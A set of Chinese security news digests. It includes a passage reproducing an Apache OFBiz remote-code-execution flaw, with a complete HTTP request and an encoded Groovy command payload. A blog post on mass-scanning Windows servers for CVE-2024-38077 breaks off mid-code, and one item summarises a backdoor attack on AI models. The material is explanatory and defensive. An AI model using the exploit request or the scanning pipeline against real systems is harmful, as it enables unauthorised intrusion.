1、新型安卓恶意软件TrickMo伪装成Chrome传播 https://www.cleafy.com/cleafy-labs/a-new-trickmo-saga-from-banking-trojan-to-victims-data-leak 研究人员发现一种新型安卓恶意软件TrickMo，其前身是TrickBot。TrickMo使用复杂的反分析技术避免被检测到。这种恶意软件通过伪装成“Google Chrome”进行传播，并利用安卓辅助功能服务来获得权限。TrickMo能够窃取在线银行服务的一次性密码、获取屏幕截图、获取按键记录，并对受感染设备进行远程访问。TrickMo通过Post方式与C2服务器交换数据，将JSON格式的设备信息回传至服务 2、伦敦交通局证实客户数据遭到泄露 https://www.bleepingcomputer.com/news/security/transport-for-london-confirms-customer-data-stolen-in-cyberattack/ 伦敦交通局（TfL）已确定9月1日的网络攻击事件泄露了客户数据，包括姓名、联系方式、电子邮件地址和家庭住址。TfL网站中的最新公告称，尽管该事件对其运营的影响很小，但内部调查发现客户数据遭到泄露。此外，TfL发现攻击者可能访问了一些Oyster卡退款数据以及大约5000名客户的银行账号和分类代码。目前尚未有任何勒索组织声称进行此次攻击。 3、Adobe修复UAF(CVE-2024-41869)高危漏洞 https://www.bleepingcomputer.com/news/security/adobe-fixes-acrobat-reader-zero-day-with-public-poc-exploit/ 安全研究人员披露了Adobe产品中的一个安全漏洞，该漏洞被标识为CVE-2024-41869，是一个use after free漏洞，在打开特制的PDF文档时可能导致远程代码执行，并且该漏洞具有公开的概念验证（PoC）代码。use after free漏洞是指程序尝试访问已被释放的内存位置中的数据，这会导致意外行为，例如程序终止或崩溃。然而，如果攻击者在该内存位置中添加恶意代码， 4、 思科修复影响多个产品的CVE-2024-20381安全漏洞 https://cybersecuritynews.com/cisco-web-management-vulnerability/ 思科披露其多个基于Web管理界面产品中使用的JSON-RPC API功能存在漏洞，涉及Cisco Crosswork Network Services Orchestrator (NSO)、Cisco Optical Site Manager和Cisco RV340双WAN千兆VPN路由器。该漏洞被标识为CVE-2024-20381，可能允许经过身份验证的远程攻击者修改受影响设备的配置并提升权限。该漏洞源于JSON-RPC API上的授权检查不当问题，具有足够权 5、为推送定制化广告，福特新专利拟广泛采集驾驶员数据 https://thecyberexpress.com/ford-patent-driver-data-in-car-ads/ 福特公司新申请的一项技术专利引发了人们对隐私问题的关注 ，该专利以推送定制化车载广告为目的，广泛收集驾驶员数据，包括车内对话。 6、澳大利亚总理希望限制社交媒体用户年龄 https://cybernews.com/news/australia-social-media-age-restriction-children-legislation/ 澳大利亚总理安东尼·阿尔巴尼斯 （Anthony Albanese） 呼吁全国支持一项年龄验证法案，该法案旨在保护儿童免受社交媒体和不当内容的危害。 7、WordPress要求插件开发人员10月前使用 2FA https://www.bleepingcomputer.com/news/security/wordpressorg-to-require-2fa-for-plugin-developers-by-october/ 该决定是WordPress插件审查团队制定的最新规则，旨在降低未经授权访问的风险，减少供应链攻击。 8、OpenAI o1发布：进一步增强了生成式AI安全合规 https://www.secrss.com/articles/70210 为了确保合规和安全，OpenAI一直使用两类公开武器：一是使用模型卡实施透明化，二是使用合规准备框架（Preparedness Framework）作为跟踪、评估和防范强大模型带来灾难性风险的流程SOP。‍‍ 9、爱尔兰数据保护监管机构将调查谷歌人工智能 https://www.anquanke.com/post/id/300059 爱尔兰数据保护机构已对 Google 的 AI 模型及其是否符合 GDPR 展开调查。爱尔兰数据保护委员会 （DPC） An Coimisiún um Chosaint Sonraí 是欧盟对 Google 的主要隐私监管机构。DPC 已根据 2018 年《数据保护法》第 110 条对 Google Ireland 展开跨境法定调查。 10、Docker Desktop 中发现两个严重的 RCE 漏洞 https://securityonline.info/cve-2024-8695-cve-2024-8696-two-critical-rce-flaws-discovered-in-docker-desktop/ Docker Desktop（一种流行的容器化应用程序开发工具）中发现了两个严重的远程代码执行 (RCE) 漏洞，编号为 CVE-2024-8695 和 CVE-2024-8696。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、西门子披露用户管理组件中的安全漏洞 https://securityonline.info/siemens-issues-critical-security-advisory-for-user-management-component-umc-cve-2024-33698 西门子披露了其用户管理组件（UMC）中的一个堆缓冲区溢出漏洞，该漏洞被标识为CVE-2024-33698，CVSS评分为9.3，可能允许未经身份验证的远程攻击者在受影响的系统上执行任意代码。UMC是西门子多个产品的重要组成部分，包括SIMATIC PCS neo分布式控制系统、SINEC NM网络管理系统和全集成自动化门户（TIA Portal）。这些系统广 2、FreeBSD披露一个影响多版本操作系统的安全漏洞 https://securityonline.info/freebsd-issues-urgent-security-advisory-for-cve-2024-43102-cvss-10 FreeBSD项目发布了一份安全公告，警告其操作系统的多个版本中存在一个安全漏洞（CVE-2024-43102）。该漏洞的CVSS评分为10分，可能允许攻击者编写恶意代码触发内核崩溃，导致系统停止；或者执行任意代码，绕过Capsicum沙箱等安全措施，导致系统被完全攻陷。该安全漏洞可能是迄今为止在FreeBSD中发现的最危险的漏洞之一。建议使用该系统的用户升级到FreeBSD的最新安全版本，尽快应用Fre 3、GitLab发布安全更新修复多个漏洞 https://cybersecuritynews.com/gitlab-critical-security-update/ GitLab发布一个安全更新，修复了多个漏洞，其中包括多个关键漏洞：CVE-2024-6678、CVE-2024-8640、CVE-2024-8635和CVE-2024-8124。此外，GitLab还修复了公告中提到的其他严重性较低的安全漏洞。利用这些漏洞可能导致未经授权的访问、权限提升、敏感数据的潜在泄露。攻击者可能控制关键基础设施组件、操纵代码或窃取私人信息。GitLab建议所有受影响的用户尽快升级到最新的修复版本（17.3.2、17.2.5和17.1.7），以降 4、WordPress插件LearnPress存在SQL注入漏洞 https://securityonline.info/cve-2024-8522-cvss-10-learnpress-sqli-flaw-leaves-90k-wordpress-sites-at-risk/ LearnPress是一个用于创建和管理在线课程的流行WordPress插件，其中存在一个SQL注入漏洞。该漏洞被标识为CVE-2024-8522，CVSS评分为10。该漏洞可能允许未经身份验证的攻击者执行恶意SQL查询，从而访问存储在受影响WordPress数据库中的敏感信息。攻击者可以利用此漏洞窃取用户数据、修改内容，甚至完全控制易受攻击的网站。LearnPress的开发人员已 5、Palo Alto 修复其产品中的多个安全漏洞 https://securityonline.info/pan-os-vulnerabilities-command-injection-cve-2024-8686-and-globalprotect-exposure-cve-2024-8687/ Palo Alto Networks最近发布了一份安全公告，修复在其产品中发现的多个安全漏洞。这些漏洞如果被利用，可能会导致未经授权的访问、数据泄露和服务中断。CVE-2024-8686是PAN-OS中的命令注入漏洞（CVSS评分为8.6），可能使经过身份验证的攻击者绕过系统限制并以root权限在防火墙上执行任意命令，攻击者可能由此完全控制受影响 6、新型安卓恶意软件"Ajina.Banker"通过TG窃取银行数据并绕过2FA https://thehackernews.com/2024/09/new-android-malware-ajinabanker-steals.html 自 2023年 11 月以来，中亚地区的银行客户就成为代号为Ajina.Banker的新型 Android 恶意软件的攻击目标，其目的是收集财务信息并拦截双因素身份验证 (2FA) 消息。2024 年 5 月，Group-IB 分析师发现针对中亚地区银行客户的可疑活动。威胁行为者一直在传播恶意的 Android 恶意软件，旨在窃取用户的个人和银行信息，并可能拦截 2FA 消息。 7、新型Vo1d恶意软件感染了全球130万台Android 电视盒 https://thehackernews.com/2024/09/beware-new-vo1d-malware-infects-13.html 来自 197 个国家的用户拥有近 130 万台运行旧版操作系统的 Android 电视盒，它们都感染了名为 Vo1d（又名 Void）的新恶意软件。俄罗斯防病毒供应商 Doctor Web在今天发布的一份报告中表示： “这是一个后门，它将组件放在系统存储区域，在攻击者的指挥下，能够秘密下载并安装第三方软件。” 8、暴露的 Selenium Grid 服务成为挖矿和代理劫持的目标 https://thehackernews.com/2024/09/exposed-selenium-grid-servers-targeted.html 不良行为者将暴露在互联网上的 Selenium Grid 实例作为非法加密货币挖掘和https://thehackernews.com/2023/08/new-labrat-campaign-exploits-gitlab.html活动的目标。 9、微软修复了自2018年以来被利用的Smart App Control零日漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-smart-app-control-zero-day-exploited-since-2018/ 微软修复了 Windows 智能应用控制和 SmartScreen 漏洞，该漏洞至少自 2018 年以来就被利用作为零日攻击。在易受攻击的系统上，威胁行为者滥用该漏洞（目前被追踪为 CVE-2024-38217）来绕过智能应用程序控制和 Web 标记 (MotW) 安全功能，从而在没有警告的情况下启动不受信任或潜在危险的二进制文件和应用程序。 10、 黑客声称窃取 440GB 文件后，Fortinet 确认数据泄露 https://www.bleepingcomputer.com/news/security/fortinet-confirms-data-breach-after-hacker-claims-to-steal-440gb-of-files/ 网络安全巨头 Fortinet 证实，其遭受了数据泄露，一名威胁行为者声称从该公司的 Microsoft Sharepoint 服务器窃取了 440GB 的文件。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

漏洞简介 Apache OFBiz 是一个开源的企业资源规划系统，提供了一整套企业管理解决方案，涵盖了许多领域，包括财务管理、供应链管理、客户关系管理、人力资源管理和电子商务等。Apache OFBiz 基于 Java 开发，采用灵活的架构和模块化设计，使其可以根据企业的需求进行定制和扩展，它具有强大的功能和可扩展性，适用于中小型企业和大型企业，帮助他们提高效率，降低成本，并实现业务流程的自动化和优化。Apache OFBiz 在处理 view 视图渲染的时候存在逻辑缺陷，未经身份验证的攻击者可通过构造特殊 URL 来覆盖最终的渲染视图，从而执行任意代码。 影响版本 Apache OFBiz <\= 18.12.14 漏洞复现 https://github.com/apache/ofbiz-framework/releases/tag/release18.12.14下载代码链接 https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.14 下载后利用 idea 打开并编译运行 构造发送数据包 POST /webtools/control/main/ProgramExport HTTP/1.1 Host: 127.0.0.1:8443 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 272 groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b 成功执行打开计算器的命令 \u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b 是 throw new Exception('calc'.execute().te 漏洞分析 applications\accounting\webapp\accounting\WEB-INF\web.xml org.apache.ofbiz.webapp.control.ControlServlet 会处理所有以/control/ 开头的路由 org.apache.ofbiz.webapp.control.ControlServlet#doPost doPost 方法转换为 doGet 请求 org.apache.ofbiz.webapp.control.ControlServlet#doGet 利用 RequestHandler 来处理请求 org.apache.ofbiz.webapp.control.RequestHandler#doRequest 在 RequestHandler#doRequest 中依次获取路由相关参数 org.apache.ofbiz.base.util.UtilHttp#getApplicationName org.apache.ofbiz.webapp.control.RequestHandler#getRequestUri org.apache.ofbiz.webapp.control.RequestHandler#getOverrideViewUri 依次获取到与路由相关的参数后，调用 resolveURI 返回路由对应的配置信息 org.apache.ofbiz.webapp.control.RequestHandler#resolveURI 这里对应的是 framework/webtools/webapp/webtools/WEB-INF/controller.xml 对应的 /webtools/control/main/ 不需要认证，所以可以继续向下执行 通过success获取到返回值的数据赋值给successResponse,然后传递给nextRequestResponse else if ("view".equals(nextRequestResponse.type)) {                if (Debug.verboseOn()) Debug.logVerbose("[RequestHandler.doRequest]: Response is a view." + showSessionId(request), module);                // check for an override view, only used if "success" = eventReturn                String viewName = (UtilValidate.isNotEmpty(overrideViewUri) && (eventReturn == null || "success".equals(eventReturn))) ? overrideViewUri : nextRequestResponse.value;                renderView(viewName, requestMap.securityExternalView, request, response, saveName);           } 在overrideViewUri 非空且 eventReturn 为 null 或 "success" 的情况下，将 viewName 设置为 overrideViewUri 。否则将 viewName 设置为 nextRequestResponse.value 。 这里请求的路径为 /main/ProgramExport 造成 view 的解析冲突，会进入到 ProgramExport 这个业务中 ，renderView 方法会解析与ProgramExport对应的请求 framework/webtools/widget/EntityScreens.xml framework/webtools/groovyScripts/entity/ProgramExport.groovy

1、RansomHub组织滥用TDSSKiller安全工具进行攻击 https://www.threatdown.com/blog/new-ransomhub-attack-uses-tdskiller-and-lazagne-disables-edr/ 卡巴斯基创建了一种名为TDSSKiller的工具，该工具可以扫描系统中是否存在rootkit和bootkit。研究人员最近发现RansomHub勒索组织滥用TDSSKiller工具，通过命令行脚本或批处理文件与内核级服务进行交互，从而禁用运行在机器上的Malwarebytes反恶意软件服务（MBAMService）。然后，RansomHub组织部署LaZagne凭证收集工具，从各种应用程序数据库中提取登录信 2、Ivanti修复多个产品中的安全漏洞 https://www.bleepingcomputer.com/news/security/ivanti-fixes-maximum-severity-rce-bug-in-endpoint-management-software/ Ivanti修复了其Endpoint Management软件（EPM）中的安全漏洞，该安全漏洞（CVE-2024-29847）是由代理门户中不受信任数据的反序列化引起，可让未经身份验证的攻击者在核心服务器上获得远程代码执行权限。此外，Ivanti还修复了Ivanti EPM、Workspace Control（IWC）和Cloud Service Appli 3、MindsDB修复CVE-2024-24759安全漏洞 https://securityonline.info/mindsdb-fixes-critical-cve-2024-24759-dns-rebinding-attack-bypasses-security-protections MindsDB是一个用于构建AI应用程序的开源平台，该平台修复了一个安全漏洞，该漏洞可能允许攻击者绕过安全措施并发起各种攻击。该漏洞被标识为CVE-2024-24759，CVSS评分为9.3，涉及利用DNS重绑定技术绕过服务器端的请求伪造（SSRF）保护。该漏洞允许攻击者绕过SSRF保护，可能使攻击者访问敏感数据、执行任意代码，甚至发起拒绝服务攻击。MindsD 4、图克斯伯里市议会遭受网络攻击 https://www.bbc.com/news/articles/cg4y7gxxnddo 图克斯伯里市议会遭受网络攻击，其系统仍处于关闭状态。议会首席执行官表示，他们认为此次事件已得到控制，并且没有证据表明数据遭到泄露。该市居民被告知在部分服务受影响期间不要向议会发送电子邮件。该议会已暂停工作面试，并表示在处理事件期间无法处理正式投诉或信息请求。议会首席执行官称，在安全的情况下，该议会将采取基于风险的方式重新上线服务，并将在此过程中进行密切监控。 5、英特尔警告20 多个处理器漏洞，建议用户更新固件 https://www.securityweek.com/intel-informs-customers-about-over-a-dozen-processor-vulnerabilities/ 英特尔周二发布安全公告，告知客户处理器和其他产品中发现的 20 多个漏洞。该芯片巨头发布了四份新公告，其中一份公告涉及 11 个漏洞，这些漏洞影响部分服务器、工作站、移动和嵌入式处理器的 UEFI 固件，包括 Atom、Xeon、Pentium、Celeron 和 Core 系列产品。 超过半数的安全漏洞被评为“高危”。这些漏洞可被用来提升本地权限，有些甚至可导致 DoS 攻击或信息泄露。 6、微软在 SymCrypt 库中添加了对后量子算法的支持 https://www.securityweek.com/microsoft-adds-support-for-post-quantum-algorithms-in-symcrypt-library/ 微软已经开始在其主要加密库 SymCrypt 中引入对后量子算法的支持。 7、DDoS 攻击次数翻倍，政府部门成为主要攻击目标 https://www.infosecurity-magazine.com/news/ddos-attacks-double-govt-targeted StormWall 的报告显示，DDoS 攻击数量翻了一番，政府部门成为最受攻击的部门。2024 年上半年全球 DDoS 事件数量与 2023 年同期相比增加了 102%。 8、Quad7僵尸网络瞄准更多SOHO和VPN路由器、媒体服务器 https://www.bleepingcomputer.com/news/security/quad7-botnet-targets-more-soho-and-vpn-routers-media-servers/ 除了之前报道的 TP-Link 和 ASUS 路由器之外，Quad7 僵尸网络还在通过使用针对 Zyxel VPN 设备、Ruckus 无线路由器和 Axentra 媒体服务器的定制恶意软件来攻击其他 SOHO 设备，从而扩大其影响范围。 9、CosmicBeetle 利用旧漏洞攻击全球中小企业 https://cybersecuritynews.com/cosmicbeetle-exploiting-old-vulnerabilities-to-attack-smbs-all-over-the-world/ 黑客主要瞄准中小型企业，因为这些企业的安全措施较弱且缺乏网络安全意识，因此更容易受到攻击。ESET 的网络安全研究人员最近发现，CosmicBeetle 一直在积极利用旧漏洞攻击全球的中小型企业。 10、微软在 Office 2024中禁用默认ActiveX 控件以提高安全性 https://www.anquanke.com/post/id/299983 自 2018 年以来，Microsoft 一直在与为不良行为者提供切入点的传统 Office 功能作斗争。从 10 月开始，Microsoft 将在 Office 套件中默认禁用 ActiveX 控件，从 Office 2024 的发布开始。逐步淘汰软件框架可能与过去被利用的许多安全漏洞有关。“从新的 Office 2024 开始，ActiveX 对象的默认配置设置将从’在启用限制最少的所有控件之前提示我’更改为’禁用所有控件而不通知’，”9 月 6 日的 Microsoft 365 消息中心的条目中写道。“此更 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、IBM修复webMethods集成中的多个安全漏洞 https://securityonline.info/cve-2024-45076-cvss-9-9-critical-flaw-in-ibm-webmethods-integration-demand-immediate-action IBM发布了一份关于其webMethods Integration Server的安全公告，披露了多个漏洞，这些漏洞可能允许经过身份验证的用户执行任意命令、提升权限和访问敏感文件，受影响的软件版本为10.15。这些漏洞分别是CVE-2024-45076（CVSS 9.9）、CVE-2024-45075（CVSS 8.8）、CVE-2024-45074（CV 2、Red Hat发布针对Pulpcore身份验证绕过漏洞的安全补丁 https://securityonline.info/red-hat-issues-critical-patch-for-pulpcore-authentication-bypass-flaw-cve-2024-7923 Red Hat发布了一个安全公告，警告Pulpcore中存在一个身份验证绕过漏洞（CVE-2024-7923）。Pulpcore是Red Hat Satellite部署中使用的内容管理系统。该漏洞的CVSS评分为9.8，可能允许未经授权的用户获得管理员访问权限，进而导致系统完全被攻陷。该漏洞影响所有使用Pulpcore 3.0或更高版本的Red Hat Satellite 3、支付网关供应商Slim CD披露一起数据泄露事件 https://www.bleepingcomputer.com/news/security/payment-gateway-data-breach-affects-17-million-credit-card-owners/ 支付网关供应商Slim CD披露了一起数据泄露事件，近170万人的信用卡和个人数据遭到泄露。Slim CD是一家提供支付处理解决方案的公司，帮助企业通过基于网络的终端、移动或桌面应用程序进行支付。该公司今年6月15日首次发现其系统中的可疑活动。在调查过程中，公司发现攻击者早在2023年8月17日就进入其网络。Slim CD表示，调查发现未经授权的系统访问发生在2023 4、Akira勒索组织利用SonicWall的漏洞进行攻击活动 https://arcticwolf.com/resources/blog/arctic-wolf-observes-akira-ransomware-campaign-targeting-sonicwall-sslvpn-accounts/ 近期，SonicWall披露了SonicOS中的一个安全漏洞CVE-2024-40766，该漏洞影响了一些SonicWall防火墙设备，并会影响防火墙的SSLVPN功能。研究人员发现，Akira勒索组织通过入侵SonicWall设备上的SSLVPN用户账号进行勒索软件攻击。在发现的每起案例中，被盗用的账号都是设备本身的本地账号，并且这些账号均未开启多因 5、世界首个有法律约束力的AI公约出炉，欧美英已签署 https://www.secrss.com/articles/69984 《AI公约》共8章36个条款，为AI规定了一系列原则，包括保护隐私和个人数据、平等和非歧视、不损害人的尊严和自主……公约要求签署国对人AI产生的任何有害和歧视性结果负责，并要求AI侵权的受害者拥有法律追索权。 6、新加坡提出立法禁止选举中使用Deepfake https://www.secrss.com/articles/70083 9月9日，新加坡数字发展和信息部(MDDI)提出了一项新立法，旨在遏制在选举期间使用深度伪造和其他数字操纵的内容。此前，民众担忧人工智能被滥用来传播错误信息。 7、62款知名App完成个人信息收集使用合规整改 https://www.secrss.com/articles/70062 为规范App收集使用个人信息行为，保护个人信息权益，推动形成全社会共同维护个人信息安全的良好环境，中国网络空间安全协会组织指导网上购物、地图导航、浏览器、新闻资讯、在线影音、电子图书、拍摄美化、云盘、短视频、演出票务共10类62款App运营方，对照《中华人民共和国网络安全法》《中华人民共和国个人信息保护法》《常见类型移动互联网应用程序必要个人信息范围规定》等法律法规，重点针对超范围收集个人信息、过度调用敏感权限、权限设置和账号注销不便等个人信息收集使用问题完成了合规整改优化。 8、微信安卓版存在高危漏洞可能导致远程代码执行 https://www.secrss.com/articles/70042 近日，网络安全公司Cisco Talos披露了腾讯微信（WeChat）应用程序中存在的一个高危安全漏洞。该漏洞允许攻击者通过微信发送的恶意链接执行远程代码，从而控制用户的设备。 9、全国网安标委发布《人工智能安全治理框架》1.0版 https://www.secrss.com/articles/70005 9月9日，在2024年国家网络安全宣传周主论坛上，全国网络安全标准化技术委员会（以下简称“网安标委”）发布《人工智能安全治理框架》1.0版。 10、微软发布Windows 更新修复被利用的零日漏洞 https://www.tenable.com/blog/microsofts-september-2024-patch-tuesday-addresses-79-cves-cve-2024-43491 CVE-2024-43491是 Microsoft Windows 更新中的一个 RCE 漏洞，影响 Windows 10 版本 1507（Windows 10 Enterprise 2015 LTSB 和 Windows 10 IoT Enterprise 2015 LTSB）上的可选组件。该漏洞的 CVSSv3 评分为 9.8，最高严重程度为严重，Microsoft 已将其标记为在野利用 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、 研究人员披露Mallox勒索软件 https://securelist.com/mallox-ransomware/113529/ Mallox勒索软件背后的攻击组织于2021年上半年开始运作，首个已知的加密样本被发现于2021年5月。该勒索软件是根据特定受害者定制的，目标公司的名称被硬编码在勒索信中并作为加密文件的扩展名。2023年，与Mallox勒索软件相关的攻击活动有所增加，发现的样本总数超过700个。2024年上半年，该恶意软件仍在积极开发中，每月发布多个新版本，同时，其背后的攻击组织也在暗网论坛中招募新的攻击者。 2、迪士尼公司泄露的数据中包含财务及战略信息 https://www.reuters.com/technology/cybersecurity/leaked-disney-data-reveals-financial-strategy-secrets-wsj-reports-2024-09-05/ 今年夏天沃尔特·迪士尼公司（DIS.N）泄露的数据中含有财务和战略信息，以及一些员工和客户的个人身份信息。该公司在8月份表示，正在调查其一个通信系统中超过1TB数据的泄露事件。据报道，泄露的部分数据中包含其邮轮工作人员的护照号码、签证详情、地址和出生地，而另一份电子表格中则包含一些迪士尼邮轮乘客的姓名、地址和电话号码。泄露的文件还包括由Dis 3、人力资源公司GigtoGig泄露大量工人的数据信息 https://cybernews.com/security/gig-workers-passports-visas-data-leak/ GigtoGig是一家英国的人力资源公司，为公司提供劳动力，并为工人提供多样化的工作机会以及薪资和保险服务。研究人员近期发现了一个配置错误的Amazon AWS S3存储库，属于GigtoGig公司。该数据库暴露了217000个敏感文件，这意味着任何人都可以在不输入用户名和密码的情况下访问数据。暴露的数据包括：122964名工人的护照、17102个工作许可证、2810个签证、26311份简历。 4、伊朗Tosan公司因网络攻击被迫支付数百万美元赎金 https://www.politico.eu/article/iran-millions-ransom-massive-cyberattack-banks/ 据行业分析师和西方官员透露，上个月一场大规模的网络攻击袭击了伊朗，威胁到该国银行系统的稳定性，并迫使Tosan公司支付至少300万美元的赎金。一个名为IRLeaks的组织可能是此次攻击的幕后黑手，该组织曾攻击过伊朗公司。据称，攻击者威胁要在暗网上出售窃取的数据，这些数据包括数百万伊朗人的个人账户和信用卡数据，并要求支付价值1000万美元的加密货币，但后来同意降低赎金金额。Tosan公司为伊朗金融部门提供多种数字服务，IRleaks组织 5、谷歌在旧版固件中推广Rust，以解决内存安全漏洞 https://www.securityweek.com/google-pushes-rust-in-legacy-firmware-to-tackle-memory-safety-flaws/ 科技巨头谷歌正在推动在现有的低级固件代码库中部署 Rust，这是对抗内存相关安全漏洞的重大举措之一。根据谷歌软件工程师 Ivan Lozano 和 Dominik Maier 提供的新文档，用 C 和 C++ 编写的旧固件代码库可以从“嵌入式 Rust 替代品”中受益，以保证操作系统以下敏感层的内存安全。 6、Kibana 存在严重漏洞，可导致系统遭受任意代码执行 https://securityonline.info/critical-kibana-flaws-cve-2024-37288-cve-2024-37285-expose-systems-to-arbitrary-code-execution/ Kibana 中存在几个严重漏洞，编号为 CVE-2024-37288 和 CVE-2024-37285，可能导致任意代码执行。Elastic 敦促立即更新至 8.15.1 版本。 7、GeoServer 严重漏洞被全球黑客大规模利用 https://www.bankinfosecurity.com/critical-geoserver-flaw-enabling-global-hack-campaigns-a-26225 GeoServer 中的这个漏洞被编号为 CVE-2024-36401，CVSS 评分为 9.8，该漏洞很快被黑客利用，他们利用僵尸网络家族和加密矿工发起攻击，传播反向代理服务器 Goreverse 等恶意工具。 8、SonicWall SSLVPN漏洞现已被 Akira 勒索软件攻击所利用 https://www.bleepingcomputer.com/news/security/sonicwall-sslvpn-access-control-flaw-is-now-exploited-in-attacks/ 最初人们认为它只会影响 SonicOS 管理访问，但现在已确认它会影响 SonicWall 防火墙上的 SSLVPN，包括 Akira 勒索软件附属机构针对禁用 MFA 和固件版本过时的帐户发起的攻击。 9、AI大模型新型噪声攻击曝光，可绕过最先进的后门检测 https://www.freebuf.com/news/410518.html 罗德岛大学的研究人员在一篇论文中提出了一种新颖的后门攻击方法，利用白高斯噪声的功率谱密度作为触发器，不仅提高了攻击的可行性和普遍性，在模型中都取得了很高的平均攻击成功率，而且不会对非受害者造成显著干扰。 10、Microsoft 使用新工具从Bing 搜索中删除报复性色情内容 https://www.bleepingcomputer.com/news/security/microsoft-removes-revenge-porn-from-bing-search-using-new-tool/ Microsoft 今天宣布，它已与 StopNCII 合作，使用人们从敏感媒体创建的数字哈希值主动从 Bing 中删除有害的私密图像和视频。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

背景 近期正值多事之秋，hvv中有CVE-2024-38077专项漏洞演习，上级police也需要检查辖区内存在漏洞的资产，自己单位领导也收到了情报，在三方共振下这个大活儿落到了我的头上。Windows Server RDL的这个漏洞原理就不过多介绍，本文重点关注如何满足大批量探测的需求。 问题 CVE-2024-38077自披露以来流传过几个poc工具，但使用过后留下的只有某某服的exe版本。可能出于保密原因，这个工具不支持的功能太多，本文就不一一列举，采用排除法自行脑补。支持的参数是指定某个IP或者某个IP段进行扫描，然后没了，就像这样： 但是这样扫来扫去无法满足需求，遇到的几个典型问题就是： 扫的为什么很慢？ 从外部导入IP怎么办？ 如何从大批量资产中筛选出有漏洞的？ 空间测绘 探测辖区内或者某一地区的资产当然离不开空间测绘工具，fofa、鹰图、shaodan、zoomeye等著名的自然要尝试一遍，搜索的关键词首先是国内+3389和135端口+windows server操作系统，协议的话可以组合RDP/RDL，这样一来搜出的资产会多达几百万条，百万量级的数据处理起来对于我们这种小散户而言属于天方夜谭。况且这些空间测绘平台中有的甚至不支持非会员大数据量查询，像shaodan这样能够显示出来已经是仁慈的了： 结果虽然搜索出来了，但是百万级的数据是拿不到的。一是不支持多端口筛选，二是不支持导出（非会员）。 这里先解决第二个问题，如何导出搜索结果？突然想起了许久未用的空间测绘工具——kunyu（坤舆）。运行起来，进去执行搜索是这样： 检查了好多遍，语法没问题。不明觉厉之际，联系了kunyu的作者@风起。询问才知道ZoomEye的普通账号权限已经不支持kunyu了。唉，只能厚着脸皮借来账号一用。 然后就是重新初始化、配置输出目录、配置查询页数......这次导出的关键就在page参数上。kunyu默认的page是1，每次显示10条，即输出的Excel中有10条数据。如果设置为1000，则会显示10000条数据，导出的数据也就是10000条，但是这样一来查询效率会大大降低。经过测试，将page设置为100是较为合适的，也就是每次显示1000条。另外配合时间参数after、before以及区域参数city、subvisions将单次搜索总量控制在1000条以内，这样就可以不漏掉资产。 最后经过一番折腾，搜索了60多次，合并多个文件后，终于生成了一份5万条左右的Excel......既然有了一堆IP，接下来该进行的就是如何把这些IP导入工具开扫。但此时的poc工具是不支持外部IP导入的，并且对于“Can Not Reach Host.”之类的资产扫描进度会很慢，所以要考虑如何兼顾效率和准确性的问题。 Nmap 由于之前经过测试，对于确实存在漏洞的资产，poc的响应是很快的。CVE-2024-38077的利用条件之一是同时开放135和3389端口，而空间测绘工具搜索的结果是未验证135的，所以接下来的思路是使用Nmap对5万个资产探测一下两个端口的开放情况，然后根据输出结果筛选出两个端口均为open状态的IP，最后尝试将筛选出的IP导入poc工具扫描。 这个阶段也尝试过fscan等其他工具，但是比较下来Nmap的输出是最整齐的（前提是控制输入参数），方便后续处理： 从输出文件可以看出，除了第一行是注释，下面的内容都很有规律，每六行是对一个IP的描述，包含135和3389两个端口，而且格式都固定。由于需求要的是开放两个端口的所有IP，现成的工具没有能够满足的，只能自己写，又一次掏出了idea...... 胶水代码 从Nmap的输出结果不难分析，如果要写代码处理的话，每六行可以看成是一个Nmap类，而这个类里面只需要3个属性，IP、port-135、port-3389。直接上代码： //读取外部文件 BufferedReader reader = new BufferedReader(new FileReader(file)); MNmap nmap = null; ArrayList<MNmap> list = new ArrayList(); int count = 0; String line; //循环读取每一行 while ((line = reader.readLine()) != null) { //ip if (line.startsWith("Nmap")) { nmap = new MNmap(); nmap.ip = TNmap.findIp(line); } //135 if (line.startsWith("135") && 